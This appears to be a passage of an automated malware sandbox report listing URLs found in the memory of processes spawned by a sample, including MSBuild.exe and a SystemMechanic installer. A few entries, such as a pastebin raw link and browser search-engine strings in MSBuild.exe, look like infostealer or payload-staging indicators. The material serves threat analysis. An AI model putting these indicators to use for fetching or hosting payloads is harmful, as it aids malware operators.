                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://download.iolo.net
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007071000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2242409589.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000000.2235272008.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000006.00000000.2240945975.000000000110C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000006.00000002.2307212182.000000000110C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://google.com
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0&
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                            Source: MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.000000000261B000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.0000000002620000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                            Source: u3z0.1.exe, 00000009.00000003.2649676502.00000000026E4000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.0000000002646000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.00000000026A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/CompositeWPF
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/prism
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.00000000026A2000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.indyproject.org/
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.000000000348F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
                            Source: u3z0.0.exe, u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                            Source: u3z0.0.exe, 00000002.00000002.2468091065.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/f
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.avira.com/download/
                            Source: u3z0.1.exe, 00000009.00000003.2649676502.0000000002664000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.06
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.azure-api.net/ent/v1
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.azure.com//.default
                            Source: MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3450053584.0000013E4FE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLThis
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3450053584.0000013E4FE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLins
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/&
